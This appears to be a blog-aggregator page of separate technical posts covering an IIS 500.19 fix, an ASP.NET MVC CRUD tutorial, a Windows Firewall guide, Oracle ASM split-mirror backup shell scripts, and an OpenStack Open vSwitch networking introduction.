    The requested page cannot be accessed because the related configuration data for the page is invalid. As part of my work recently I was moving SQL Monitor from the bespoke XSP web server to be hosted on IIS instead. This didn't go smoothly. I was lucky to be helped by Red Gate's support team (http://twitter.com/kickasssupport). I had SQL Monitor installed and working fine on the XSP site but wanted to move to IIS, so I reinstalled the software and chose the IIS option. This wasn't possible, as IIS wasn't installed on the server. I went to Control Panel, Windows features, installed IIS, and then returned to the SQL Monitor installer. Everything went as planned, but when I browsed the site I got a huge error with the message "HTTP Error 500.19 - Internal Server Error. The requested page cannot be accessed because the related configuration data for the page is invalid." All the links I could find suggested it was a permissions issue, based on the directory where the config file was stored. I changed this any number of times and also tried altering its location. Nothing resolved the error. It was only when I was trying the installation again that I read through the details from Red Gate and noted that they referred to ASP settings that I didn't have. Essentially I was seeing this. I had installed IIS using the default settings, and those DON'T include ASP. When this dawned on me I went back through the Windows components installation process and ticked the ASP service within the IIS role. Completing this and going back to the IIS management console, I saw something like this; so many more options! When I clicked on the Authentication icon this time I got the option to enable not only Anonymous Authentication but also ASP.NET Impersonation (which is disabled by default). Once I had enabled this, the SQL Monitor website worked without error. I think the HTTP Error 500.19 message is misleading in this case; at the very least IIS should be able to recognise whether the ASP service is installed or not and include a hint that it should be. I hope this helps some people and avoids wasting as much of your time as it did mine. Let me know if it helps you.
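    For what it's worth, the missing role service can also be added from an elevated command line instead of the Windows Features dialog. A hedged sketch wrapping DISM from C# follows; the IIS-ASP feature name is my assumption for this version of Windows, so run dism /online /get-features first to confirm the exact name on your server:

using System.Diagnostics;

class EnableAspRoleService
{
    static void Main()
    {
        // Enables the classic ASP role service under IIS; must run elevated.
        // The feature name is an assumption; verify with "dism /online /get-features".
        ProcessStartInfo psi = new ProcessStartInfo(
            "dism.exe",
            "/online /enable-feature /featurename:IIS-ASP")
        {
            UseShellExecute = false
        };

        Process.Start(psi).WaitForExit();
    }
}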

    Read the article

  • Yet Another ASP.NET MVC CRUD Tutorial

    - by Ricardo Peres
    I know that I have not posted much on MVC, mostly because I don’t use it in my daily life, but since I find it so interesting, and since it is gaining such popularity, I will be talking about it much more. This time, it’s about the most basic of scenarios: CRUD. Although there are several ASP.NET MVC tutorials out there that cover ordinary CRUD operations, I couldn’t find any that would explain how we can also have AJAX, optimistic concurrency control and validation, using Entity Framework Code First, so I set out to write one! I won’t go into explaining what MVC, Code First, optimistic concurrency control or AJAX are; I assume you are all familiar with these concepts by now. Let’s consider a hypothetical use case: products. For simplicity, we only want to be able to either view a single product or edit it. First, we need our model:

public class Product
{
    public Product()
    {
        this.Details = new HashSet<OrderDetail>();
    }

    [Required]
    [StringLength(50)]
    public String Name
    {
        get;
        set;
    }

    [Key]
    [ScaffoldColumn(false)]
    [DatabaseGenerated(DatabaseGeneratedOption.Identity)]
    public Int32 ProductId
    {
        get;
        set;
    }

    [Required]
    [Range(1, 100)]
    public Decimal Price
    {
        get;
        set;
    }

    public virtual ISet<OrderDetail> Details
    {
        get;
        protected set;
    }

    [Timestamp]
    [ScaffoldColumn(false)]
    public Byte[] RowVersion
    {
        get;
        set;
    }
}

Keep in mind that this is a simple scenario. Let’s see what we have: a class Product that maps to a product record on the database; a product has a required (RequiredAttribute) Name property which can contain up to 50 characters (StringLengthAttribute); the product’s Price must be a decimal value between 1 and 100 (RangeAttribute); it contains a set of order details, for each time that it has been ordered, which we will not talk about (Details); the record’s primary key (mapped to property ProductId) comes from a SQL Server IDENTITY column generated by the database (KeyAttribute, DatabaseGeneratedAttribute); and the table uses a SQL Server ROWVERSION (previously known as TIMESTAMP) column for optimistic concurrency control, mapped to property RowVersion (TimestampAttribute). Then we will need a controller for viewing product details, which will be located in folder ~/Controllers under the name ProductController:

public class ProductController : Controller
{
    [HttpGet]
    public ViewResult Get(Int32 id = 0)
    {
        if (id != 0)
        {
            using (ProductContext ctx = new ProductContext())
            {
                return (this.View("Single", ctx.Products.Find(id) ?? new Product()));
            }
        }
        else
        {
            return (this.View("Single", new Product()));
        }
    }
}

If the requested product does not exist, or one was not requested at all, one with default values will be returned. I am using a view named Single to display the product’s details, more on that later. As you can see, it delegates the loading of products to an Entity Framework context, which is defined as:

public class ProductContext : DbContext
{
    public DbSet<Product> Products
    {
        get;
        set;
    }
}

Like I said before, I’ll keep it simple for now; only the aggregate root Product is available.
The controller will use the standard routes defined by the Visual Studio ASP.NET MVC 3 template:

routes.MapRoute(
    "Default", // Route name
    "{controller}/{action}/{id}", // URL with parameters
    new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults
);

Next, we need a view for displaying the product details; let’s call it Single and have it located under ~/Views/Product:

<%@ Page Language="C#" Inherits="System.Web.Mvc.ViewPage<Product>" %>
<!DOCTYPE html>

<html>
<head runat="server">
    <title>Product</title>
    <script src="/Scripts/jquery-1.7.2.js" type="text/javascript"></script>
    <script src="/Scripts/jquery-ui-1.8.19.js" type="text/javascript"></script>
    <script src="/Scripts/jquery.unobtrusive-ajax.js" type="text/javascript"></script>
    <script src="/Scripts/jquery.validate.js" type="text/javascript"></script>
    <script src="/Scripts/jquery.validate.unobtrusive.js" type="text/javascript"></script>
    <script type="text/javascript">
        function onFailure(error)
        {
        }

        function onSuccess(ctx)
        {
        }
    </script>
</head>
<body>
    <div>
        <%: this.Html.ValidationSummary(false) %>
        <% using (this.Ajax.BeginForm("Edit", "Product", new AjaxOptions { HttpMethod = FormMethod.Post.ToString(), OnSuccess = "onSuccess", OnFailure = "onFailure" })) { %>
            <%: this.Html.EditorForModel() %>
            <input type="submit" name="submit" value="Submit" />
        <% } %>
    </div>
</body>
</html>

Yes… I am using ASPX syntax… sorry about that! I implemented an editor template for the Product class, which must be located in the ~/Views/Shared/EditorTemplates folder as file Product.ascx:

<%@ Control Language="C#" Inherits="System.Web.Mvc.ViewUserControl<Product>" %>
<div>
    <%: this.Html.HiddenFor(model => model.ProductId) %>
    <%: this.Html.HiddenFor(model => model.RowVersion) %>
    <fieldset>
        <legend>Product</legend>
        <div class="editor-label">
            <%: this.Html.LabelFor(model => model.Name) %>
        </div>
        <div class="editor-field">
            <%: this.Html.TextBoxFor(model => model.Name) %>
            <%: this.Html.ValidationMessageFor(model => model.Name) %>
        </div>
        <div class="editor-label">
            <%= this.Html.LabelFor(model => model.Price) %>
        </div>
        <div class="editor-field">
            <%= this.Html.TextBoxFor(model => model.Price) %>
            <%: this.Html.ValidationMessageFor(model => model.Price) %>
        </div>
    </fieldset>
</div>

One thing you’ll notice is that I am including both the ProductId and the RowVersion properties as hidden fields; they will come in handy later, so that we know which product and version we are editing. The other thing is the included JavaScript files: jQuery, jQuery UI and the unobtrusive validations. Also, I am not using the Content extension method for translating relative URLs, because that way I would lose JavaScript IntelliSense for the jQuery functions. OK, so, at this moment, I want to add support for AJAX and optimistic concurrency control, so I write a controller method like this:

[HttpPost]
[AjaxOnly]
[Authorize]
public JsonResult Edit(Product product)
{
    if (this.TryValidateModel(product) == true)
    {
        using (ProductContext ctx = new ProductContext())
        {
            Boolean success = false;

            ctx.Entry(product).State = (product.ProductId == 0) ? EntityState.Added : EntityState.Modified;

            try
            {
                success = (ctx.SaveChanges() == 1);
            }
            catch (DbUpdateConcurrencyException)
            {
                ctx.Entry(product).Reload();
            }

            return (this.Json(new { Success = success, ProductId = product.ProductId, RowVersion = Convert.ToBase64String(product.RowVersion) }));
        }
    }
    else
    {
        return (this.Json(new { Success = false, ProductId = 0, RowVersion = String.Empty }));
    }
}

So, this method is only valid for HTTP POST requests (HttpPost), coming from AJAX (AjaxOnly, from MVC Futures), and from authenticated users (Authorize). It returns a JSON object, which is what you would normally use for AJAX requests, containing three properties: Success, a boolean flag; RowVersion, the current version of the ROWVERSION column as a Base-64 string; and ProductId, the inserted product id, as coming from the database. If the product is new, it will be inserted into the database, and its primary key will be returned in the ProductId property; Success will be set to true. If a DbUpdateConcurrencyException occurs, it means that the value in the RowVersion property does not match the current ROWVERSION column value on the database, so the record must have been modified between the time that the page was loaded and the time we attempted to save the product. In this case, the controller just gets the new value from the database and returns it in the JSON object; Success will be false. Otherwise, the record will be updated, and Success, ProductId and RowVersion will all have their values set accordingly. So let’s see how we can react to these situations on the client side. Specifically, we want to deal with these situations: the user is not logged in when the update/create request is made, perhaps because the cookie expired; the optimistic concurrency check failed; all went well. So, let’s change our view:

<%@ Page Language="C#" Inherits="System.Web.Mvc.ViewPage<Product>" %>
<%@ Import Namespace="System.Web.Security" %>

<!DOCTYPE html>

<html>
<head runat="server">
    <title>Product</title>
    <script src="/Scripts/jquery-1.7.2.js" type="text/javascript"></script>
    <script src="/Scripts/jquery-ui-1.8.19.js" type="text/javascript"></script>
    <script src="/Scripts/jquery.unobtrusive-ajax.js" type="text/javascript"></script>
    <script src="/Scripts/jquery.validate.js" type="text/javascript"></script>
    <script src="/Scripts/jquery.validate.unobtrusive.js" type="text/javascript"></script>
    <script type="text/javascript">
        function onFailure(error)
        {
            window.alert('An error occurred: ' + error);
        }

        function onSuccess(ctx)
        {
            if (typeof (ctx.Success) != 'undefined')
            {
                $('input#ProductId').val(ctx.ProductId);
                $('input#RowVersion').val(ctx.RowVersion);

                if (ctx.Success == false)
                {
                    window.alert('An error occurred while updating the entity: it may have been modified by third parties. Please try again.');
                }
                else
                {
                    window.alert('Saved successfully');
                }
            }
            else
            {
                if (window.confirm('Not logged in. Login now?') == true)
                {
                    document.location.href = '<%: FormsAuthentication.LoginUrl %>?ReturnURL=' + document.location.pathname;
                }
            }
        }
    </script>
</head>
<body>
    <div>
        <%: this.Html.ValidationSummary(false) %>
        <% using (this.Ajax.BeginForm("Edit", "Product", new AjaxOptions { HttpMethod = FormMethod.Post.ToString(), OnSuccess = "onSuccess", OnFailure = "onFailure" })) { %>
            <%: this.Html.EditorForModel() %>
            <input type="submit" name="submit" value="Submit" />
        <% } %>
    </div>
</body>
</html>

The implementation of the onSuccess function first checks if the response contains a Success property; if not, the most likely cause is that the request was redirected to the login page (using Forms Authentication) because it wasn’t authenticated, so we navigate there as well, keeping a reference to the current page. It then saves the current values of the ProductId and RowVersion properties to their respective hidden fields. They will be sent on each successive post and will be used in determining whether the request is for adding a new product or for updating an existing one. The only thing missing is the ability to insert a new product after inserting/editing an existing one, which can be easily achieved using this snippet:

<input type="button" value="New" onclick="$('input#ProductId').val('');$('input#RowVersion').val('');" />

And that’s it.
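    A final note on the AjaxOnly attribute: it lives in the MVC Futures package (Microsoft.Web.Mvc). If you would rather not take that dependency, a minimal stand-in is easy to write; this sketch simply rejects any request that did not arrive via XMLHttpRequest:

using System.Reflection;
using System.Web.Mvc;

/// <summary>
/// A minimal stand-in for the MVC Futures AjaxOnlyAttribute:
/// the action is selectable only for AJAX requests.
/// </summary>
public sealed class AjaxOnlyAttribute : ActionMethodSelectorAttribute
{
    public override bool IsValidForRequest(ControllerContext controllerContext, MethodInfo methodInfo)
    {
        // IsAjaxRequest() checks the X-Requested-With header that jQuery
        // and the unobtrusive AJAX scripts send with every request.
        return controllerContext.HttpContext.Request.IsAjaxRequest();
    }
}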

    Read the article

  • [GEEK SCHOOL] Network Security 4: Windows Firewall: Your System’s Best Defense

    - by Ciprian Rusen
    If you have your computer connected to a network, or directly to your Internet connection, then having a firewall is an absolute necessity. In this lesson we will discuss the Windows Firewall – one of the best security features available in Windows! The Windows Firewall made its debut in Windows XP. Prior to that, Windows systems needed to rely on third-party solutions or dedicated hardware to protect them from network-based attacks. Over the years, Microsoft has done a great job with it and it is one of the best firewalls you will ever find for Windows operating systems. Seriously, it is so good that some commercial vendors have decided to piggyback on it! Let’s talk about what you will learn in this lesson. First, you will learn about what the Windows Firewall is, what it does, and how it works. Afterward, you will start to get your hands dirty and edit the list of apps, programs, and features that are allowed to communicate through the Windows Firewall depending on the type of network you are connected to. Moving on from there, you will learn how to add new apps or programs to the list of allowed items and how to remove the apps and programs that you want to block. Last but not least, you will learn how to enable or disable the Windows Firewall, for only one type of network or for all network connections. By the end of this lesson, you should know enough about the Windows Firewall to use and manage it effectively. What is the Windows Firewall? Windows Firewall is an important security application that’s built into Windows. One of its roles is to block unauthorized access to your computer. The second role is to permit authorized data communications to and from your computer. Windows Firewall does these things with the help of rules and exceptions that are applied both to inbound and outbound traffic. They are applied depending on the type of network you are connected to and the location you have set for it in Windows when connecting to the network. Based on your choice, the Windows Firewall automatically adjusts the rules and exceptions applied to that network. This makes the Windows Firewall a product that’s silent and easy to use. It bothers you only when it doesn’t have any rules and exceptions for what you are trying to do or what the programs running on your computer are trying to do. If you need a refresher on the concept of network locations, we recommend you read our How-To Geek School class on Windows Networking. Another benefit of the Windows Firewall is that it is so tightly and nicely integrated into Windows and all its networking features that some commercial vendors decided to piggyback onto it and use it in their security products. For example, products from companies like Trend Micro or F-Secure no longer provide their proprietary firewall modules but use the Windows Firewall instead. Except for a few wording differences, the Windows Firewall works the same in Windows 7 and Windows 8.x. The only notable difference is that in Windows 8.x you will see the word “app” being used instead of “program”. Where to Find the Windows Firewall By default, the Windows Firewall is turned on and you don’t need to do anything special in order for it to work. You will see it displaying some prompts once in a while, but they show up so rarely that you might forget it is even working. If you want to access it and configure the way it works, go to the Control Panel, then go to “System and Security” and select “Windows Firewall”.
Now you will see the Windows Firewall window, where you can get a quick glimpse of whether it is turned on and the type of network you are connected to: private networks or public networks. For the network type that you are connected to, you will see additional information like: the state of the Windows Firewall; how the Windows Firewall deals with incoming connections; the active network; and when the Windows Firewall will notify you. You can easily expand the other section and view the default settings that apply when connecting to networks of that type. If you have installed a third-party security application that also includes a firewall module, chances are that the Windows Firewall has been disabled, in order to avoid performance issues and conflicts between the two security products. If that is the case for your computer or device, you won’t be able to view any information in the Windows Firewall window and you won’t be able to configure the way it works. Instead, you will see a warning that says: “These settings are being managed by vendor application – Application Name”. In the screenshot below you can see an example of how this looks. How to Allow Desktop Applications Through the Windows Firewall Windows Firewall has a very comprehensive set of rules, and most Windows programs that you install add their own exceptions to the Windows Firewall so that they receive network and Internet access. This means that you will see prompts from the Windows Firewall on occasion, generally when you install programs that do not add their own exceptions to the Windows Firewall’s list. In a Windows Firewall prompt, you are asked to select the network locations to which you allow access for that program: private networks or public networks. By default, Windows Firewall selects the checkbox that’s appropriate for the network you are currently using. You can decide to allow access for both types of network locations or just to one of them. To apply your setting press “Allow access”. If you want to block network access for that program, press “Cancel” and the program will be set as blocked for both network locations. At this step you should note that only administrators can set exceptions in the Windows Firewall. If you are using a standard account without administrator permissions, the programs that do not comply with the Windows Firewall rules and exceptions are automatically blocked, without any prompts being shown. You should note that in Windows 8.x you will never see any Windows Firewall prompts related to apps from the Windows Store. They are automatically given access to the network and the Internet based on the assumption that you are aware of the permissions they require based on the information displayed by the Windows Store. Windows Firewall rules and exceptions are automatically created for each app that you install from the Windows Store. However, you can easily block access to the network and the Internet for any app, using the instructions in the next section. How to Customize the Rules for Allowed Apps Windows Firewall allows any user with an administrator account to change the list of rules and exceptions applied for apps and desktop programs. In order to do this, first start the Windows Firewall. On the column on the left, click or tap “Allow an app or feature through Windows Firewall” (in Windows 8.x) or “Allow a program or feature through Windows Firewall” (in Windows 7). Now you see the list of apps and programs that are allowed to communicate through the Windows Firewall.
At this point, the list is grayed out and you can only view which apps, features, and programs have rules that are enabled in the Windows Firewall.
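    Incidentally, everything the allowed apps list does can also be scripted, which is handy when you manage many machines. Here is a hedged sketch that shells out to netsh; the rule name and program path are placeholders, and the command must run elevated:

using System.Diagnostics;

class AllowAppThroughFirewall
{
    static void Main()
    {
        // Roughly equivalent to ticking an app's "Private" checkbox
        // in the "Allowed apps" window.
        ProcessStartInfo psi = new ProcessStartInfo(
            "netsh",
            "advfirewall firewall add rule name=\"My App\" dir=in action=allow " +
            "program=\"C:\\Program Files\\MyApp\\MyApp.exe\" profile=private enable=yes")
        {
            UseShellExecute = false
        };

        Process.Start(psi).WaitForExit();
    }
}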

    Read the article

  • On automating a split-mirror ASM backup with EMC TimeFinder ...

    - by [email protected]
    Hi clerks, offloading the backup operation to another host using disk cloning can really improve performance on highly busy databases (24x7, zero downtime and all this stuff...). There are well-known white papers on this subject, ASM included, but today I'm showing you a nice way to automate the procedure using shell scripting with EMC TimeFinder technologies.

    Assumptions:
    ***********
    ASM diskgroup names:
      +data_${db_name} : ASM data diskgroup
      +fra_${db_name}  : ASM FRA diskgroup
    EMC TimeFinder sync group names:
      rac_${DB_NAME}_data_tf : data group
      rac_${DB_NAME}_fra_tf  : FRA group

    There are two scripts: one located on the production box (bck_database.sh) and the other one on the backup server node (bck_database_mirror.sh). The second one is remotely executed from the production host. There are a bunch of variables along the code with self-explanatory names, I guess; anyway, let me know if you want some help.

    #!/bin/ksh
    ###
    ###  Copyright (c) 1988, 2010, Oracle Corporation.  All Rights Reserved.
    ###
    ###    NAME
    ###     bck_database.sh
    ###
    ###    DESCRIPTION
    ###     Database backup on third mirror
    ###
    ###    RETURNS
    ###
    ###    NOTES
    ###
    ###    MODIFIED                (DD/MM/YY)
    ###    Oracle       28/01/10   - Creation
    ###

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    V_FICH_LOG=`dirname $0`/trace_dir_location/`basename $0`.${V_DATE}.log
    exec 4>&1
    tee ${V_FICH_LOG} >&4 |&
    exec 1>&p 2>&1

    ADMIN_DIR=`dirname $0`
    # This script should set the instance vars like ORACLE_HOME, SID, DB_NAME ...
    . ${ADMIN_DIR}/setenv_instance.sh
    if [ $? -ne 0 ]
    then
      echo "Error when setting the environment."
      exit 1
    fi

    echo "${V_DATE} ####################################################"
    echo "Executing database backup: ${DB_NAME}"
    echo "####################################################################"

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Sync asm data diskgroups ..."
    echo "####################################################################"
    sudo symmir -g rac_${DB_NAME}_data_tf establish -noprompt
    if [ $? -ne 0 ]
    then
      echo "Error when syncing asm data diskgroups"
      exit 2
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Verifying asm data disks ..."
    echo "####################################################################"
    sudo symmir -g rac_${DB_NAME}_data_tf -i 30 verify
    if [ $? -ne 0 ]
    then
      echo "Error when verifying asm data diskgroups"
      exit 3
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Sync asm fra diskgroups ..."
    echo "####################################################################"
    sudo symmir -g rac_${DB_NAME}_fra_tf establish -noprompt
    if [ $? -ne 0 ]
    then
      echo "Error when syncing asm fra diskgroups"
      exit 4
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Verifying asm fra disks ..."
    echo "####################################################################"
    sudo symmir -g rac_${DB_NAME}_fra_tf -i 30 verify
    if [ $? -ne 0 ]
    then
      echo "Error when verifying asm fra diskgroups"
      exit 5
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "ASM sync successfully completed!"
    echo "####################################################################"

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Updating status ${DB_NAME} to BEGIN BACKUP ..."
    echo "####################################################################"
    sqlplus -s /nolog <<-!
      whenever sqlerror exit 1
      connect / as sysdba
      whenever sqlerror exit
      alter system archive log current;
      alter database ${DB_NAME} begin backup;
    !
    if [ $? -ne 0 ]
    then
      echo "Error when updating database status to BEGIN backup"
      exit 6
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Splitting asm data disks ..."
    echo "####################################################################"
    sudo symmir -g rac_${DB_NAME}_data_tf split -noprompt
    if [ $? -ne 0 ]
    then
      echo "Error when splitting asm data disks"
      exit 7
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Updating status ${DB_NAME} to END BACKUP ..."
    echo "####################################################################"
    sqlplus -s /nolog <<-!
      whenever sqlerror exit 1
      connect / as sysdba
      whenever sqlerror exit
      alter database ${DB_NAME} end backup;
      alter system archive log current;
    !
    if [ $? -ne 0 ]
    then
      echo "Error when updating database status to END backup"
      exit 8
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Generating controlfile copies ..."
    echo "####################################################################"
    rman <<-!
    connect target /
    run {
    allocate channel ch1 type DISK;
    copy current controlfile to '+FRA_${DB_NAME}/${DB_NAME}/CONTROLFILE/control_mount.ctl';
    copy current controlfile to '+FRA_${DB_NAME}/${DB_NAME}/CONTROLFILE/control_backup.ctl';
    }
    !
    if [ $? -ne 0 ]
    then
      echo "Error generating controlfile copies"
      exit 9
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Resync RMAN catalog ..."
    echo "####################################################################"
    rman <<-!
    connect target /
    connect catalog ${V_RMAN_USR}/${V_RMAN_PWD}@${V_DB_CATALOG}
    resync catalog;
    !
    if [ $? -ne 0 ]
    then
      echo "Error when resyncing RMAN catalog"
      exit 10
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Splitting asm fra disks ..."
    echo "####################################################################"
    sudo symmir -g rac_${DB_NAME}_fra_tf split -noprompt
    if [ $? -ne 0 ]
    then
      echo "Error when splitting asm fra disks"
      exit 11
    fi

    echo "WARNING!: Calling bck_database_mirror.sh on host ${NODE_BCK_SERVER} ..."
    ssh ${NODE_BCK_SERVER} ${ADMIN_DIR_BCK}/bck_database_mirror.sh
    if [ $? -ne 0 ]
    then
      echo "Error when remotely executing the backup"
      exit 12
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Cleaning the archived redo logs already copied to tape ..."
    echo "####################################################################"
    rman <<-!
    connect target /
    connect catalog ${V_RMAN_USR}/${V_RMAN_PWD}@${V_DB_CATALOG}
    run {
    resync catalog;
    delete noprompt archivelog all backed up 1 times to device type sbt;
    }
    !
    if [ $? -ne 0 ]
    then
      echo "Error when cleaning the archived redo logs"
      exit 13
    fi

    echo "${V_DATE} ####################################################"
    echo "Backup successfully executed!!"
    echo "####################################################################"
    exit 0

    ------------------------------------------------------------------------------
    ------------------------ ** BACKUP SERVER NODE ** ---------------------------
    ------------------------------------------------------------------------------

    #!/bin/ksh
    ###
    ###  Copyright (c) 1988, 2010, Oracle Corporation.  All Rights Reserved.
    ###
    ###    NAME
    ###     bck_database_mirror.sh
    ###
    ###    DESCRIPTION
    ###      Backup @ backup server
    ###
    ###    RETURNS
    ###
    ###    NOTES
    ###
    ###    MODIFIED                (DD/MM/YY)
    ###    Oracle       28/01/10   - Creation
    ###

    V_ADMIN_DIR=`dirname $0`

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Starting ASM instance ..."
    echo "####################################################################"
    # This script is supposed to start the ASM instance on the backup server
    ${V_ADMIN_DIR}/start_asm.sh
    if [ $? -ne 0 ]
    then
      echo "Error when trying to start ASM instance."
      exit 1
    fi

    # This script is supposed to set the env. variables of the ASM instance
    . ${V_ADMIN_DIR}/setenv_asm.sh
    if [ $? -ne 0 ]
    then
      echo "Error when setting the ASM environment"
      exit 1
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "The asm diskgroups/disks detected are the following ..."
    echo "####################################################################"
    sqlplus /nolog <<-!
      whenever sqlerror exit 1
      connect / as sysdba
      whenever sqlerror exit
      SET LINES 200
      COL PATH FORMAT A25
      SELECT DISK.MOUNT_STATUS, DISK.PATH, DISK.NAME, DISK_GROUP.NAME, DISK_GROUP.TOTAL_MB
        FROM V\$ASM_DISK DISK, V\$ASM_DISKGROUP DISK_GROUP
       WHERE DISK.GROUP_NUMBER=DISK_GROUP.GROUP_NUMBER;
    !

    # This script is supposed to set the env. variables of the database instance
    . ${V_ADMIN_DIR}/setenv_instance.sh
    if [ $? -ne 0 ]
    then
      echo "Error when setting the database instance environment"
      exit 1
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Starting ${DB_NAME} in MOUNT mode ..."
    echo "####################################################################"
    # This script is supposed to do a startup mount
    ${V_ADMIN_DIR}/start_instance_mount.sh
    if [ $? -ne 0 ]
    then
      echo "Error starting ${DB_NAME} in MOUNT mode"
      exit 1
    fi

    V_DATE=`/bin/date +%Y%m%d_%H%M%S`
    echo "${V_DATE} ####################################################"
    echo "Executing RMAN backup ..."
    echo "####################################################################"
    rman <<-!
    connect target /
    connect catalog ${V_RMAN_USR}/${V_RMAN_PWD}@${V_DB_CATALOG}
    run {
    # TDPO Media Library
    allocate channel ch1 type 'SBT_TAPE' parms 'ENV=(TDPO_OPTFILE=/opt/tivoli/tsm/client/oracle/bin64/tdpo.opt)';
    crosscheck archivelog all;
    backup tag BCK_CONTROLFILE_ST_${DB_NAME} format 'ctl_%d_%s__%p_%t' controlfilecopy '+FRA_${DB_NAME}/${DB_NAME}/CONTROLFILE/control_backup.ctl';
    backup tag BCK_DATAFILE_ST_${DB_NAME} full format 'db_%d_%s_%p_%t' database;
    backup tag BCK_ARCHLOG_ST_${DB_NAME} format 'al_%d_%s_%p_%t' archivelog all;
    release channel ch1;
    }
    !
    if [ $? -ne 0 ]
    then
      echo "Error executing the RMAN backup"
      exit 1
    fi

    # These scripts are supposed to do a shutdown immediate of the database and ASM instances
    ${V_ADMIN_DIR}/stop_instance_immediate.sh
    ${V_ADMIN_DIR}/stop_asm_immediate.sh
    exit 0

    Hope it helps someone! --L
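    One operational note: bck_database.sh drives bck_database_mirror.sh over ssh non-interactively, so password-less key authentication from the production host to the backup node is assumed to be in place. A minimal sketch of that one-time setup (the user and host names are hypothetical):

    # run as the oracle user on the production host
    ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
    ssh-copy-id oracle@backupnode
    ssh oracle@backupnode true   # must return without prompting for a password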

    Read the article

  • Diving into OpenStack Network Architecture - Part 1

    - by Ronen Kofman
    Before we begin

    OpenStack networking has very powerful capabilities, but at the same time it is quite complicated. In this blog series we will review an existing OpenStack setup using the Oracle OpenStack Tech Preview and explain the different network components through use cases and examples. The goal is to show how the different pieces come together and provide a bigger picture view of the network architecture in OpenStack. This can be very helpful to users taking their first steps in OpenStack, or to anyone who wishes to understand how networking works in this environment. We will go through the basics first and build the examples as we go.

    According to the recent Icehouse user survey and the one before it, Neutron with the Open vSwitch plug-in is the most widely used network setup both in production and in POCs (in terms of number of customers), so in this blog series we will analyze this specific OpenStack networking setup. As we know, there are many options for setting up OpenStack networking, and while Neutron + Open vSwitch is the most popular setup there is no claim that it is the best or most efficient option. Neutron + Open vSwitch is an example, one which provides a good starting point for anyone interested in understanding OpenStack networking. Even if you are using a different kind of network setup, such as a different Neutron plug-in or no Neutron at all, this will still be a good starting point for understanding the network architecture in OpenStack.

    The setup we are using for the examples is the one used in the Oracle OpenStack Tech Preview. Installing it is simple and it would be helpful to have it as a reference. In this setup we use eth2 on all servers for the VM network; all VM traffic will be flowing through this interface. The Oracle OpenStack Tech Preview uses VLANs for L2 isolation to provide tenant and network isolation. The diagram referenced here shows how we have configured our deployment.

    This first post is a bit long and will focus on some basic concepts in OpenStack networking. The components we will be discussing are Open vSwitch, network namespaces, Linux bridge and veth pairs. Note that this is not meant to be a comprehensive review of these components; each component is described only as much as needed to understand the OpenStack network architecture. All the components described here can be further explored using other resources.
    Open vSwitch (OVS)

    In the Oracle OpenStack Tech Preview, OVS is used to connect virtual machines to the physical port (in our case eth2) as shown in the deployment diagram. OVS contains bridges and ports. The OVS bridges are different from the Linux bridges (controlled by the brctl command), which are also used in this setup. To get started, let's view the OVS structure using the following command:

    # ovs-vsctl show
    7ec51567-ab42-49e8-906d-b854309c9edf
        Bridge br-int
            Port br-int
                Interface br-int
                    type: internal
            Port "int-br-eth2"
                Interface "int-br-eth2"
        Bridge "br-eth2"
            Port "br-eth2"
                Interface "br-eth2"
                    type: internal
            Port "eth2"
                Interface "eth2"
            Port "phy-br-eth2"
                Interface "phy-br-eth2"
        ovs_version: "1.11.0"

    We see a standard post-deployment OVS on a compute node with two bridges and several ports hanging off each of them. The example above is from a compute node without any VMs; we can see that the physical port eth2 is connected to a bridge called "br-eth2". We also see two ports, "int-br-eth2" and "phy-br-eth2", which are actually a veth pair and form a virtual wire between the two bridges (veth pairs are discussed later in this post). When a virtual machine is created, a port is created on the br-int bridge, and this port is eventually connected to the virtual machine (we will discuss the exact connectivity later in the series). Here is how OVS looks after a VM was launched:

    # ovs-vsctl show
    efd98c87-dc62-422d-8f73-a68c2a14e73d
        Bridge br-int
            Port "int-br-eth2"
                Interface "int-br-eth2"
            Port br-int
                Interface br-int
                    type: internal
            Port "qvocb64ea96-9f"
                tag: 1
                Interface "qvocb64ea96-9f"
        Bridge "br-eth2"
            Port "phy-br-eth2"
                Interface "phy-br-eth2"
            Port "br-eth2"
                Interface "br-eth2"
                    type: internal
            Port "eth2"
                Interface "eth2"
        ovs_version: "1.11.0"

    Bridge "br-int" now has a new port "qvocb64ea96-9f", which connects to the VM and is tagged with VLAN 1. Every VM that is launched will add a port on the br-int bridge for every network interface the VM has.

    Another useful OVS command is dump-flows, for example:

    # ovs-ofctl dump-flows br-int
    NXST_FLOW reply (xid=0x4):
     cookie=0x0, duration=735.544s, table=0, n_packets=70, n_bytes=9976, idle_age=17, priority=3,in_port=1,dl_vlan=1000 actions=mod_vlan_vid:1,NORMAL
     cookie=0x0, duration=76679.786s, table=0, n_packets=0, n_bytes=0, idle_age=65534, hard_age=65534, priority=2,in_port=1 actions=drop
